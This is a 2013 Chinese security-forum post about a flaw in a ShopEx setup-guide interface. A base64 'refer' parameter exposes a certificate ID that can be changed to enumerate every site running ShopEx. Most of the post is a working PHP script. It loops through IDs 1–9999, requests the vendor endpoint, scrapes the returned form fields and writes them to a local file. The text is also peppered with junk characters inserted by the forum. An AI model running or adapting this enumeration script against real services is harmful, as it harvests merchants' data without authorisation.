找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2615|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
! b+ ]+ {/ Y0 B9 wShopEx某接口缺陷,可遍历所有网站/ k' E* e) r2 F# B
详细说明:
5 Y0 E$ R+ N3 k  \问题出现在shopex 网店使用向导页面 * r( _9 F" d% ~3 V& {2 e4 }) N: h% H

5 v; ^. \  ~3 q6 d( z' A+ {5 ]4 ^: e* D8 G

5 K9 p( V6 M, n+ k. Jhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) @% |2 Z4 S. L3 @  o$ w8 F: O7 G
/ l& {5 q& \5 ^' k* i+ M3 M
* n4 ]+ ]" v) ]" F- E, Y/ [/ [
9 L$ I+ y  _" a3 H
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 b" {2 w) L/ S# V' I
7 Y1 b; T# r# K6 I: c" E7 W& n- \) i* I1 Y
! \/ n) Y) @. p0 b4 F6 I
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
  ~( P- S3 |& h% {
, Y/ ~8 P/ J4 h( q; \. w  k$ Z* x" c
( j5 z; X; }$ F: a8 D, v- k( Z3 m  T
<?php1 u! Q5 H. r: z3 y

) p: C3 n. A, W" A6 _) k                for ($i=1; $i < 10000; $i++) { //遍历  y2 D4 h) E3 \- q8 D0 Y% M
- {& @3 d3 K0 E7 k) h9 \4 S
                        ShowshopExD($i);
" h6 c( K' f& N5 {1 q5 ]1 }6 X  {
  p* A/ Q- ]- e: {% y                }( H+ h  o5 k* R/ v5 ^% H

9 P/ ~9 ~/ t- }$ p4 q2 V! G7 O                function ShowshopExD($cid) {% t4 w, m" |2 L1 Y/ r9 ^

2 o' f1 r4 _2 N                $url='http://guide.ecos.shopex.cn/step2.php';
, u# A6 Z7 f, @9 B) q( J0 m8 x( F2 g. P2 @' s7 o
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: H% A2 V) N8 J' P; {. i
- N1 j  E" s4 I) Y+ M6 p
        $url = $url.'?refer='.$refer;
3 o. ?- _* A# j7 ~
/ R* U: f2 K) ~/ J" N8 t, g        $ch = curl_init($url);" ^. Y# {; _, K: |2 a$ w' F
, E  O! r' j$ p/ t
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
# ^7 g% G1 d; p' g* V  Y2 C- B3 t% _' P, P+ Z7 X8 P) Q( F
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
  d6 E: s( y& q7 J# p1 g5 H7 t- K1 v$ F( l% b
        $result = curl_exec($ch);9 N( ]7 H9 w+ |& Q& C

2 I5 U0 S- G% T3 q3 g# u        $result = mb_convert_encoding($result, "gb2312", "UTF-8");" t; Z% Q9 O; b! j, ~

: p! V5 }5 G. G9 G0 N1 X! n        if(strpos($result,$refer))
# _# d$ N; N+ m- V& q0 ]3 o; b, Z0 ]5 Y) n2 H6 s* c( Y
        {8 ?$ n' g7 c6 S; X" b. c/ o$ z

. @4 }5 }% Z: o- E! l                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
$ H! H) J% {1 V/ F- M: E0 i( d9 e/ _6 a5 D8 d1 k. d4 D: O+ R+ s
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
/ s- [) ^; y7 ~/ E
! i2 u- N2 \- i' V. W' J; k                foreach ($value[1] as $key) {
  ]/ E$ \8 `9 p; F& i
! x5 c/ _0 w( p7 m" H# N6 H# g                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
4 @/ p1 t! P! V# H' _
* v+ G6 Q) v; M: y9 m$ A" M4 ~                        echo $res[1][0].':'.$res[3][0]."\r\n";
; H) U- I  _  }% S# U2 M6 A3 d5 L) _1 o
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; 0 c  Y8 `1 k1 M) n$ ]0 }  u
% u9 T; T( n5 Y# z# t2 R1 i7 _
                        fwrite($fp, $col, strlen($col)); & ~% I* C' e5 l$ t4 y1 r. n0 D

8 d5 J! e/ _% J7 m6 V                }7 m. K4 g' \9 [8 ~
$ f& R4 d0 {4 L. C$ p1 x9 I' \5 ~' Z2 S
                echo '--------------------------------'."\r\n";
' l3 J5 @$ S4 u( |9 N8 N( X7 G3 ?! u; z. C5 H5 w& y
                fclose($fp); 2 j. e# N2 h+ B! k& H8 i5 q) v5 d
! B( Q" r, [( ?/ e' q& ]; o9 m4 d/ F
        }
; k- ^; M# p% f# F
; v3 N! T' r1 |! F" h8 P# |        flush();- N+ o$ L, a. A4 y$ s. }7 C6 F1 h: p
& i& d. B: c9 Z6 h
        curl_close($ch);1 n9 j$ w  J; F( L
7 E7 B( R# I. }- d1 I# }/ K
                }
$ `* H" D0 h0 p& {$ o, X
' X# R1 L/ G  o/ Q* y?>
! W+ }, B' f& e( h2 \5 G+ x漏洞证明:
, P+ W% M* N! @6 n: z- Ohttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg  ~  O9 ~$ F7 |  |+ d4 K# s) f
refer换成其他加密方式# [0 E& `! m5 z$ a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表